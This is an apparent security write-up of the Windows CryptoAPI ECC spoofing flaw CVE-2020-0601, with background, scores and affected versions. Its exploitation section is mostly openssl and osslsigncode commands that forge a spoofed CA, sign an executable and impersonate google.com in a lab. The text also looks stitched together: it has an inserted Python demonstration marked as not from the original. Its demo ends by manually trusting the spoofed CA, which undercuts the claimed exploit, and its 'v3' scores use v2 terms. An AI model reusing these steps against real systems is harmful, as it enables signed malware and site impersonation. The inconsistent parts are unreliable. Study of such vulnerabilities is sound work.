
Windows CryptoAPI Spoofing – Incorrect Certificate Validation – CVE-2020-0601

Vulnerability Details:

A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source.

ECC relies on a set of curve parameters. These parameters are standardized for many named curves. However, the system did not check all of them: the generator G was not validated, so an attacker can supply their own generator. When the system validates the certificate against a trusted CA, it only looks for a matching public key and then uses the generator taken from the certificate.

To yield the same public key and thereby spoof the certificate, the private key is set to 1:

Public Key = Private Key * Generator

Public Key = Generator

The trusted CA's public key is used as the generator of the spoofing certificate, and the generator is not validated by the system.

MicrosoftECCProductRootCertificateAuthority.cer is by default a trusted root certificate authority (CA) using ECC on Windows 10. Anything signed with this certificate will therefore automatically be trusted.
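The following is an added example, not code from the original post or from the PoC it references: a small pure-Python model of P-256 (secp256r1, standard SEC 2 constants) showing why a validator must compare the whole curve parameter set and not only the public key point. The trusted private key, the dictionary layout and the two match functions are constructed for illustration.

```python
# secp256r1 (P-256) domain parameters from SEC 2 / FIPS 186-4.
P = 2**256 - 2**224 + 2**192 + 2**96 - 1
A = P - 3
B = 0x5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B
GX = 0x6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296
GY = 0x4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5
G = (GX, GY)  # the standard generator of the named curve

def on_curve(pt):
    x, y = pt
    return (y * y - (x * x * x + A * x + B)) % P == 0

def add(p1, p2):
    # Affine point addition on y^2 = x^3 + Ax + B over GF(P); None is infinity.
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)

def mul(k, pt):
    # Double-and-add scalar multiplication: k * pt.
    acc = None
    while k:
        if k & 1:
            acc = add(acc, pt)
        pt = add(pt, pt)
        k >>= 1
    return acc

def weak_match(trusted, cand):
    # The flawed comparison: only the public key point is compared.
    return trusted["public"] == cand["public"]

def strict_match(trusted, cand):
    # Corrected comparison: the generator carried in explicit parameters must
    # equal the named curve's generator (stand-in here for the full parameter set).
    return cand["generator"] == G and trusted["public"] == cand["public"]

D_TRUSTED = 0x1F5A3C  # constructed sample private key of the trusted root
TRUSTED = {"generator": G, "public": mul(D_TRUSTED, G)}
# Key with explicit parameters: generator = trusted public key, private key = 1.
CRAFTED = {"generator": TRUSTED["public"], "public": mul(1, TRUSTED["public"])}
```

weak_match accepts CRAFTED because the public key points are identical; strict_match rejects it because its generator is not the named curve's G.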

CVSS v3:

  • Base Score 5.8

  • Confidentiality Impact Partial

  • Integrity Impact Partial

  • Access Complexity Medium

  • Authentication not required

  • Availability Impact None

Mitigation:

Microsoft has released Windows updates (2020) that patch the CVE-2020-0601 vulnerability.

Major Impacted Systems:

  • Windows 10 Version 1607

  • Windows 10 Version 1709

  • Windows 10 Version 1803

  • Windows 10 Version 1809

  • Windows 10 Version 1903

  • Windows 10 Version 1909

  • Windows Server 2016

  • Windows Server 2016 Version 1803

  • Windows Server 2016 Version 1903

  • Windows Server 2016 Version 1909

  • Windows Server 2019

Exploitation:

Files location – https://packetstormsecurity.com/files/author/14686

Extract the public key from the trusted CA:

ruby main.rb ./MicrosoftECCProductRootCertificateAuthority.cer

Generate a new X.509 certificate based on this key. This will be the spoofed CA:

openssl req -new -x509 -key spoofed_ca.key -out spoofed_ca.crt

Generate a new key. It will be used to create a code-signing certificate, which we will sign with our own CA:

openssl ecparam -name secp384r1 -genkey -noout -out cert.key

Next, create a new certificate signing request (CSR):

openssl req -new -key cert.key -out cert.csr -config openssl_tls.conf -reqexts v3_tls

Sign the new CSR with the spoofed CA and its key. This certificate will expire in 2047, whereas the real trusted Microsoft CA will expire in 2043:

openssl x509 -req -in cert.csr -CA spoofed_ca.crt -CAkey spoofed_ca.key -CAcreateserial \
  -out cert.crt -days 10000 -extfile openssl_tls.conf -extensions v3_tls

Pack the certificate, its key and the spoofed CA into a PKCS#12 file for signing executables:

openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed_ca.crt -name "Code Signing" -out cert.p12

Sign your executable with the PKCS#12 file:

osslsigncode sign -pkcs12 cert.p12 -n "Signed" -in 7z1900-x64.exe -out 7z1900-x64_signed.exe

In the Windows VM, open C:\Windows\System32\drivers\etc\hosts.

Add an entry mapping the IP address of the Ubuntu VM to the host of https://www.google.com.

The files cert.crt, cert.key and spoofed_ca.crt are used to serve content. Add spoofed_ca.crt to the certificate chain in your server's HTTPS configuration and configure the "index.js" server file.

Start the server in the Ubuntu VM.

In Windows VM, open browser and navigate to https://www.google.com.

The error "Your connection isn't private" is displayed.

Check the certificate information: it now shows the details of the spoofed certificate.

The root CA certificate is not trusted because it is not in the Trusted Root Certification Authorities store.

Export the certificate.

Install the spoofed certificate in Trusted Root Certification Authorities.

The spoofed certificate is now in Trusted Root Certification Authorities.

Open a browser (Internet Explorer) and navigate to https://www.google.com.

The spoofed CA is validated by the web browser as a trusted root CA, and the original https://www.google.com content is replaced with the incorrect information defined in the "index.js" file.

CVE-2020-0601, the Windows incorrect ECC certificate validation vulnerability, has thus been demonstrated.

Reference:

https://nvd.nist.gov/vuln/detail/CVE-2020-0601

https://packetstormsecurity.com/files/author/14686/

github.com-ollypwn-CVE-2020-0601_-_2020-01-17_10-09-11
